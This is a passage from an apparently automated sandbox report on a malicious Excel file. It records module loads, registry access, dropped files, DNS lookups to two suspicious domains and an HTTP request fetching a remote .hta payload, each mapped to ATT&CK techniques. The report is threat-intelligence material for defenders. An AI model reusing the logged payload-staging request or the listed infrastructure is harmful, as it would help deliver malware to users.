\"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"EXCEL.EXE\" loaded module \"VERSION.DLL\" at base 74bb0000\n \"EXCEL.EXE\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICESOFTWAREPROTECTIONPLATFORM\\OSPPC.DLL\" at base 6cfc0000\n \"EXCEL.EXE\" loaded module \"RPCRT4.DLL\" at base 75eb0000\n \"EXCEL.EXE\" loaded module \"UXTHEME.DLL\" at base 74290000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77070000\n \"EXCEL.EXE\" loaded module \"POWRPROF.DLL\" at base 745d0000\n \"EXCEL.EXE\" loaded module \"USER32.DLL\" at base 77740000\n \"EXCEL.EXE\" loaded module \"COMCTL32\" at base 74610000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 77150000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77620000\n \"EXCEL.EXE\" loaded module \"CRYPTSP.DLL\" at base 75120000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74eb0000\n \"EXCEL.EXE\" loaded module \"RPCRTREMOTE.DLL\" at base 756b0000\n \"EXCEL.EXE\" loaded module \"WTSAPI32.DLL\" at base 73c60000\n \"EXCEL.EXE\" loaded module \"WINSTA.DLL\" at base 75680000\n \"EXCEL.EXE\" loaded module \"SHELL32.DLL\" at base 75fd0000\n \"EXCEL.EXE\" loaded module \"OLE32.DLL\" at base 77150000\n \"EXCEL.EXE\" loaded module \"OLEAUT32.DLL\" at base 77430000\n \"EXCEL.EXE\" loaded module \"SETUPAPI.DLL\" at base 76ed0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 743c0000\n \"EXCEL.EXE\" loaded module \"NTMARTA.DLL\" at base 74b80000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77620000\n \"EXCEL.EXE\" loaded module \"PROFAPI.DLL\" at base 75730000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 759b0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 774d0000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75a40000\n \"EXCEL.EXE\" loaded module \"SECUR32.DLL\" at base 75440000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71aa0000\n \"EXCEL.EXE\" loaded module \"MPR.DLL\" at base 71e70000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\MSXML6.DLL\" at base 71190000\n \"EXCEL.EXE\" loaded module \"GDI32.DLL\" at base 77970000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 772b0000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 72720000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 759c0000\n \"EXCEL.EXE\" loaded module \"WS2_32.DLL\" at base 779c0000\n \"EXCEL.EXE\" loaded module \"WINHTTP.DLL\" at base 71680000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 750e0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 750d0000\n \"EXCEL.EXE\" loaded module \"IPHLPAPI.DLL\" at base 73a70000\n \"EXCEL.EXE\" loaded module \"CRYPT32.DLL\" at base 75750000\n \"EXCEL.EXE\" loaded module \"USERENV.DLL\" at base 75a20000\n \"EXCEL.EXE\" loaded module \"DNSAPI.DLL\" at base 74fa0000\n \"EXCEL.EXE\" loaded module \"DHCPCSVC6.DLL\" at base 73980000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6d680000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74c40000\n \"EXCEL.EXE\" loaded module \"DHCPCSVC.DLL\" at base 738a0000\n \"EXCEL.EXE\" loaded module \"RASADHLP.DLL\" at base 71e60000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6ca30000\n \"EXCEL.EXE\" loaded module \"URLMON.DLL\" at base 774d0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 77430000\n \"EXCEL.EXE\" loaded module \"SXS.DLL\" at base 75620000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 76c20000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 739e0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 779c0000\n \"EXCEL.EXE\" loaded module \"CREDSSP.DLL\" at base 74de0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 74f20000\n \"EXCEL.EXE\" loaded module \"NCRYPT.DLL\" at base 75250000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74df0000\n \"EXCEL.EXE\" loaded module \"WINTRUST.DLL\" at base 75880000\n \"EXCEL.EXE\" loaded module \"GPAPI.DLL\" at base 74cf0000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77620000\n \"EXCEL.EXE\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77620000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 77380000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75fd0000\n \"EXCEL.EXE\" loaded module \"APPHELP.DLL\" at base 755c0000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a790000\n \"EXCEL.EXE\" loaded module \"LINKINFO.DLL\" at base 6e690000\n \"EXCEL.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\KERNEL32.DLL\" at base 77070000\n \"EXCEL.EXE\" loaded module \"NTSHRUI.DLL\" at base 72180000\n \"EXCEL.EXE\" loaded module \"SRVCLI.DLL\" at base 75310000\n \"EXCEL.EXE\" loaded module \"CSCAPI.DLL\" at base 70ac0000\n \"EXCEL.EXE\" loaded module \"SLC.DLL\" at base 73ac0000\n \"EXCEL.EXE\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICESOFTWAREPROTECTIONPLATFORM\\OSPPCEXT.DLL\" at base 68870000\n \"EXCEL.EXE\" loaded module \"%PROGRAMFILES%\\MICROSOFT OFFICE\\OFFICE14\\MSOSTYLE.DLL\" at base 6d150000\n \"EXCEL.EXE\" loaded module \"SSPICLI.DLL\" at base 755a0000\n \"EXCEL.EXE\" loaded module \"NETUTILS.DLL\" at base 73f60000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835\" was detected as \"Microsoft Compound\" and name: \"Archive\"\n \"f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835\" was detected as \"Microsoft Compound\" and name: \"Data\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-248", "type": 6, "relevance": 2, "name": "Tries to open documents files", "description": "\"EXCEL.EXE\" opens a file C:\\f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls (UID: 00000000-00005852)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-2", "type": 10, "name": "Loads rich edit control libraries", "description": "\"EXCEL.EXE\" loaded module \"%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\RICHED20.DLL\" at 6A370000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-3", "type": 7, "relevance": 5, "name": "Tries to GET non-existent files from a webserver", "description": "\"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nConnection: Keep-Alive\nHost: <IPv4>\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"link.emcdn.ru\"\n \"loooooooooooooooooooog.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls.LNK\" - Location: [%APPDATA%\\Microsoft\\Office\\Recent\\f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls.LNK]- [targetUID: 00000000-00005852]\n Dropped file: \"6B235454.emf\" - Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\6B235454.emf]- [targetUID: 00000000-00005852]\n Dropped file: \"C098C045.emf\" - Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\C098C045.emf]- [targetUID: 00000000-00005852]\n Dropped file: \"index.dat\" - Location: [%APPDATA%\\Microsoft\\Office\\Recent\\index.dat]- [targetUID: 00000000-00005852]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-204", "type": 6, "relevance": 3, "name": "Creates/edits LNK file (Windows shortcut)", "description": "\"EXCEL.EXE\" writes to LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Office\\Recent\\f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls.LNK\"\n \"EXCEL.EXE\" writes to LNK file \"%APPDATA%\\Microsoft\\Office\\Recent\\f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls.LNK\"", "origin": "API Call", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"EXCEL.EXE\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat\"\n \"EXCEL.EXE\" writes a file \"%APPDATA%\\Microsoft\\Office\\Recent\\index.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\OFFICE\\14.0\\COMMON\\SHIPASSERTS\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\COMMON\\SHIPASSERTS\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\COMDLG32\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\COMDLG32\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\PROFILELIST\\S-1-5-21-2092356043-4041700817-663127204-1001\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\OFFICE\\14.0\\COMMON\\GENERAL\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\.XLS\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.XLS\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\.XLS\\OPENWITHPROGIDS\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.XLS\\OPENWITHPROGIDS\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FILEEXTS\\.XLS\\OPENWITHPROGIDS\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FILEEXTS\\.XLS\\OPENWITHPROGIDS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\PROFILELIST\\S-1-5-21-2092356043-4041700817-663127204-1001\"; Key: \"PROFILEIMAGEPATH\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\COMMON\\GENERAL\"; Key: \"RECENTFILES\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.XLS\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.XLS\"; Key: \"PERCEIVEDTYPE\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\SYSTEMFILEASSOCIATIONS\\.XLS\"; Key: \"PERCEIVEDTYPE\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXCEL.SHEET.8\"; Key: \"DOCOBJECT\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXCEL.SHEET.8\\DOCOBJECT\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXCEL.SHEET.8\\CLSID\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXCEL.SHEET.8\"; Key: \"ISSHORTCUT\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\SYSTEMFILEASSOCIATIONS\\.XLS\"; Key: \"ISSHORTCUT\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXCEL.SHEET.8\"; Key: \"ALWAYSSHOWEXT\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\SYSTEMFILEASSOCIATIONS\\.XLS\"; Key: \"ALWAYSSHOWEXT\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXCEL.SHEET.8\"; Key: \"NEVERSHOWEXT\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\SYSTEMFILEASSOCIATIONS\\.XLS\"; Key: \"NEVERSHOWEXT\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\COMMON\"; Key: \"QMENABLE\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021401-0000-0000-C000-000000000046}\\PROGID\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021401-0000-0000-C000-000000000046}\"; Key: \"\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021401-0000-0000-C000-000000000046}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021401-0000-0000-C000-000000000046}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"EXCEL.EXE\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"EXCEL.EXE\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"EXCEL.EXE\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"EXCEL.EXE\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"EXCEL.EXE\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"EXCEL.EXE\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"EXCEL.EXE\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"EXCEL.EXE\" trying to touch file \"C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE.config\"\n \"EXCEL.EXE\" trying to touch file \"\\Device\\MountPointManager\"\n \"EXCEL.EXE\" trying to touch file \"C:\"\n \"EXCEL.EXE\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Office\\review.rcd\"\n \"EXCEL.EXE\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Office\\adhoc.rcd\"\n \"EXCEL.EXE\" trying to touch file \"\\Device\\Afd\"\n \"EXCEL.EXE\" trying to touch file \"\\Device\\Nsi\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls.LNK\" has type \"MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Mon Feb 10 08:54:22 2025 mtime=Mon Feb 10 08:54:22 2025 atime=Mon Feb 10 07:54:20 2025 length=1252864 window=hide\"- Location: [%APPDATA%\\Microsoft\\Office\\Recent\\f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls.LNK]- [targetUID: 00000000-00005852]\n \"6B235454.emf\" has type \"Windows Enhanced Metafile (EMF) image data version 0x10000\"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\6B235454.emf]- [targetUID: 00000000-00005852]\n \"C098C045.emf\" has type \"Windows Enhanced Metafile (EMF) image data version 0x10000\"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\C098C045.emf]- [targetUID: 00000000-00005852]\n \"index.dat\" has type \"data\"- Location: [%APPDATA%\\Microsoft\\Office\\Recent\\index.dat]- [targetUID: 00000000-00005852]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"EXCEL.EXE\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\CVRACE1.tmp\" to \"%TEMP%\\CVRACE1.tmp.cvr\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"EXCEL.EXE\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005852)\n \"EXCEL.EXE\" called \"LookupAccountSidW\" with param Name SYSTEM (UID: 00000000-00005852)\n \"EXCEL.EXE\" called \"LookupAccountSidW\" with param Name NETWORK SERVICE (UID: 00000000-00005852)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-3", "type": 17, "relevance": 5, "name": "Short-term SSL certificate detected", "description": "Short term registered certificate: \"link.emcdn.ru\" (89 days old)\n Short term registered certificate: \"loooooooooooooooooooog.com\" (90 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"EXCEL.EXE\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (UID: 00000000-00005852)\n \"EXCEL.EXE\" called \"InternetOpenW with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (UID: 00000000-00005852)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-215", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a HTTP or FTP session", "description": "\"EXCEL.EXE\" called \"InternetConnectW\" to server \"loooooooooooooooooooog.com\" on port 443 (UID: 00000000-00005852)", "origin": "API Call", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-143", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a new HTTP request", "description": "\"EXCEL.EXE\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /Biki\" - (UID: 00000000-00005852)", "origin": "API Call", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-78", "type": 7, "relevance": 1, "name": "HTTP requests contain custom Base62 strings", "description": "Contains base62 string in header \"sheisbestforbetterforgoodthingsto\" in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Connection: Keep-AliveHost: <IPv4>\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b\n Observed JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d\n Observed JA3 fingerprint: db95a4cb23548a635a1dfebcee9991cb", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-54", "type": 7, "relevance": 1, "name": "Making HTTPS connections using secure TLS/SSL version", "description": "Connection was made using TLSv1.2 [tls.handshake.version: 0x0303]", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"/430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood\" in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 